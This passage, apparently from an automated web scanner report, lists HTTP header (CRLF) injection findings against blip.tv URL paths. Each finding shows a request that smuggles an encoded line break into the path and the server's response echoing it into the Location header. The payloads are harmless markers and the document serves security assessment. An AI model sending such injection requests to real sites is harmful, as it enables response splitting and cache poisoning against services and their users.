<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8d0e4
0170a13e0d6/AYKc0AIC"
...[SNIP]...

2.193. http://blip.tv/play/AYKc0AIC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6d2e1%0d%0ae5aa42e7cd7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/6d2e1%0d%0ae5aa42e7cd7 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/6d2e1
e5aa42e7cd7

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1248907258
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/6d2e1
e5aa42e7cd7">her
...[SNIP]...

2.194. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload af3c1%0d%0a7e3157c4790 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /af3c1%0d%0a7e3157c4790/AYKc0AIC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/af3c1
7e3157c4790
/AYKc0AIC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 1324529371
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/af3c1
7e3157c4790/AYKc0AIC/
...[SNIP]...

2.195. http://blip.tv/play/AYKc0AIC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc0AIC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 88c5c%0d%0a4123e2554df was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/88c5c%0d%0a4123e2554df/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/88c5c
4123e2554df
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1248907308
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/88c5c
4123e2554df/">he
...[SNIP]...

2.196. http://blip.tv/play/AYKc93MC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 30765%0d%0addbbb830a25 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /30765%0d%0addbbb830a25/AYKc93MC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/30765
ddbbb830a25
/AYKc93MC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 2146047415
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/30765
ddbbb830a25/AYKc93MC"
...[SNIP]...

2.197. http://blip.tv/play/AYKc93MC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload bbbd9%0d%0a90a0f111b1d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/bbbd9%0d%0a90a0f111b1d HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/bbbd9
90a0f111b1d

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:40 GMT
X-Varnish: 1324529310
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/bbbd9
90a0f111b1d">her
...[SNIP]...

2.198. http://blip.tv/play/AYKc93MC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fb325%0d%0a32ab4049851 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fb325%0d%0a32ab4049851/AYKc93MC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fb325
32ab4049851
/AYKc93MC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 1324529851
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fb325
32ab4049851/AYKc93MC/
...[SNIP]...

2.199. http://blip.tv/play/AYKc93MC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKc93MC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2f6c3%0d%0a2b45d599e82 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/2f6c3%0d%0a2b45d599e82/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/2f6c3
2b45d599e82
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 2146047961
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/2f6c3
2b45d599e82/">he
...[SNIP]...

2.200. http://blip.tv/play/AYKcqGYC [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload bb0b6%0d%0ab0c1664273c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /bb0b6%0d%0ab0c1664273c/AYKcqGYC HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/bb0b6
b0c1664273c
/AYKcqGYC
Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1324529445
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/bb0b6
b0c1664273c/AYKcqGYC"
...[SNIP]...

2.201. http://blip.tv/play/AYKcqGYC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f589d%0d%0ad979631150a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/f589d%0d%0ad979631150a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/f589d
d979631150a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1324529500
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/f589d
d979631150a">her
...[SNIP]...

2.202. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e21a2%0d%0a89670705052 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e21a2%0d%0a89670705052/AYKcqGYC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e21a2
89670705052
/AYKcqGYC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:42 GMT
X-Varnish: 1025269189
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e21a2
89670705052/AYKcqGYC/
...[SNIP]...

2.203. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 68177%0d%0a9b57f6a14de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/68177%0d%0a9b57f6a14de/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/68177
9b57f6a14de
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 344229413
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/68177
9b57f6a14de/">he
...[SNIP]...

2.204. http://blip.tv/play/AYKcqGYD [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYD

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6f9f0%0d%0abcd2357f9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6f9f0%0d%0abcd2357f9fd/AYKcqGYD HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/6f9f0
bcd2357f9fd
/AYKcqGYD
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 1498217998
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6f9f0
bcd2357f9fd/AYKcqGYD"
...[SNIP]...

2.205. http://blip.tv/play/AYKcqGYD [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYD

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ed49c%0d%0a7dc169f519e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/ed49c%0d%0a7dc169f519e HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/ed49c
7dc169f519e

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 344228345
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/ed49c
7dc169f519e">her
...[SNIP]...

2.206. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2359b%0d%0a2068ebd89cb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2359b%0d%0a2068ebd89cb/hK5wgpzTKAI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2359b
2068ebd89cb
/hK5wgpzTKAI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1248906534
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2359b
2068ebd89cb/hK5wgpzTK
...[SNIP]...

2.207. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d21e3%0d%0a40709f5e0a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/d21e3%0d%0a40709f5e0a0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/d21e3
40709f5e0a0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1324528736
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/d21e3
40709f5e0a0">her
...[SNIP]...

2.208. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7038c%0d%0afea36d9b505 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7038c%0d%0afea36d9b505/hK5wgpzTKAI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7038c
fea36d9b505
/hK5wgpzTKAI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1274883062
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7038c
fea36d9b505/hK5wgpzTK
...[SNIP]...

2.209. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6cc24%0d%0ae23d6c3b0c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/6cc24%0d%0ae23d6c3b0c5/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/6cc24
e23d6c3b0c5
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:37 GMT
X-Varnish: 344228475
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/6cc24
e23d6c3b0c5/">he
...[SNIP]...

2.210. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2e516%0d%0af8e22e5a25d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2e516%0d%0af8e22e5a25d/hbdrgpvFPAI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2e516
f8e22e5a25d
/hbdrgpvFPAI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1324528912
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2e516
f8e22e5a25d/hbdrgpvFP
...[SNIP]...

2.211. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a8ba0%0d%0a60cebc1b852 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/a8ba0%0d%0a60cebc1b852 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/a8ba0
60cebc1b852

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1498218377
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/a8ba0
60cebc1b852">her
...[SNIP]...

2.212. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 61d32%0d%0a59830f082de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /61d32%0d%0a59830f082de/hbdrgpvFPAI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/61d32
59830f082de
/hbdrgpvFPAI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 2146047566
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/61d32
59830f082de/hbdrgpvFP
...[SNIP]...

2.213. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e67be%0d%0ab38a774bfd6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/e67be%0d%0ab38a774bfd6/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/e67be
b38a774bfd6
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 344229197
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/e67be
b38a774bfd6/">he
...[SNIP]...

2.214. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f5faf%0d%0aad9111d4936 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f5faf%0d%0aad9111d4936/hbgSgoqOawI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
